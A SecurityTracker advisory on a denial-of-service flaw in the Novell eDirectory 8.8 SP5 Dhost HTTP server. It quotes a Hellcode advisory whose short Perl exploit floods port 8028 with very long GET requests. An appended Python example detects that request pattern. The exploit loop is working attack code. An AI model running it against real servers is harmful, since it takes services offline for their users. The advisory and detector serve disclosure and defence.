SecurityTracker.com
Category:   Application (Directory)  >   Novell eDirectory
Vendors:   Novell
Novell eDirectory HTTP Request Processing Flaw Lets Remote Users Deny Service
SecurityTracker Alert ID:  1022849
SecurityTracker URL:  http://securitytracker.com/id/1022849
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Sep 8 2009
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 8.8 SP5
Description:   A vulnerability was reported in Novell eDirectory. A remote user can cause denial of service conditions.

A remote user can send a specially crafted request containing Unicode strings to the Dhost HTTP server to cause the target service to consume all available CPU resources.

Hellcode Research reported this vulnerability.

The original advisory is available at:

http://tcc.hellcode.net/advisories/hellcode-adv003.txt

Impact:   A remote user can cause the target service to consume excessive CPU resources on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.novell.com/
Cause:   Not specified

Message History:   None.


 Source Message Contents

Subject:  Novell eDirectory 8.8 SP5 Dhost Http Server DoS

Affected Software:
Novell eDirectory 8.8 SP5

Vulnerability Description:
Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack.
If a remote attacker sends Unicode strings in an HTTP request to port 8028
(8028 is the default port of the Novell eDirectory Dhost HTTP server),
the attacker can cause the system to consume 100% of the CPU resources.

Credits to:
Hellcode Research

Original Advisory: 
http://tcc.hellcode.net/advisories/hellcode-adv003.txt

Exploit:

	- snip-
....

$data = "?" x 500000;

for($i= 0; $i < 1000; $i++)
{
	$sock= new IO::Socket::INET( PeerAddr => "localhost",
	PeerPort => 8028,

	Proto => 'tcp',
	Type => SOCK_STREAM, 

	);
	
	print $sock "GET /$data HTTP/1.0\r\n\r\n";
	
	close($sock);
}

...
	- snip -
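
Added example (not part of the SecurityTracker entry or the Hellcode advisory): since no solution is listed, the Python code below shows one way to flag the reported request pattern in captured request heads or proxy logs, namely oversized or raw non-ASCII request-targets sent repeatedly to port 8028. The 8192-byte limit, the burst threshold of 20, the (source, port, request head) record shape and the sample records are assumptions constructed for illustration.

```python
from collections import Counter

DHOST_PORT = 8028          # default Dhost HTTP server port, per the advisory
MAX_TARGET_BYTES = 8192    # assumed limit; tune to the longest legitimate URI
BURST_THRESHOLD = 20       # assumed: flagged requests per source before alerting


def classify_request(raw, dst_port):
    """Return the reasons a captured request head matches the reported pattern."""
    if dst_port != DHOST_PORT:
        return []
    request_line = raw.split(b"\r\n", 1)[0]
    parts = request_line.split(b" ")
    if len(parts) < 2:
        return ["malformed request line"]
    target = parts[1]
    reasons = []
    if len(target) > MAX_TARGET_BYTES:
        reasons.append(f"request-target is {len(target)} bytes")
    # URIs are expected to be percent-encoded; raw high bytes are non-conforming.
    if any(b > 0x7F for b in target):
        reasons.append("raw non-ASCII bytes in request-target")
    return reasons


def sources_to_alert(records):
    """records: iterable of (src_ip, dst_port, raw_head). Returns {src_ip: hits}."""
    hits = Counter()
    for src, port, raw in records:
        if classify_request(raw, port):
            hits[src] += 1
    return {src: n for src, n in hits.items() if n >= BURST_THRESHOLD}


# Constructed sample capture (documentation addresses, not real traffic).
LONG_TARGET = b"/" + "\u00e9".encode("utf-8") * 6000   # 12001 bytes
LONG_REQUEST = b"GET " + LONG_TARGET + b" HTTP/1.0\r\n\r\n"
SAMPLE = (
    [("192.0.2.10", 8028, b"GET / HTTP/1.0\r\n\r\n")]   # normal request
    + [("198.51.100.7", 8028, LONG_REQUEST)] * 25        # repeated oversized URI
    + [("203.0.113.5", 8080, LONG_REQUEST)]              # different port, ignored
)

if __name__ == "__main__":
    for src, count in sources_to_alert(SAMPLE).items():
        print(f"ALERT {src}: {count} suspicious requests to port {DHOST_PORT}")
```

The same length and byte checks can be enforced at a reverse proxy or firewall placed in front of port 8028, so that oversized requests are rejected before they reach the Dhost HTTP server.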

 
 



Copyright 2019, SecurityGlobal.net LLC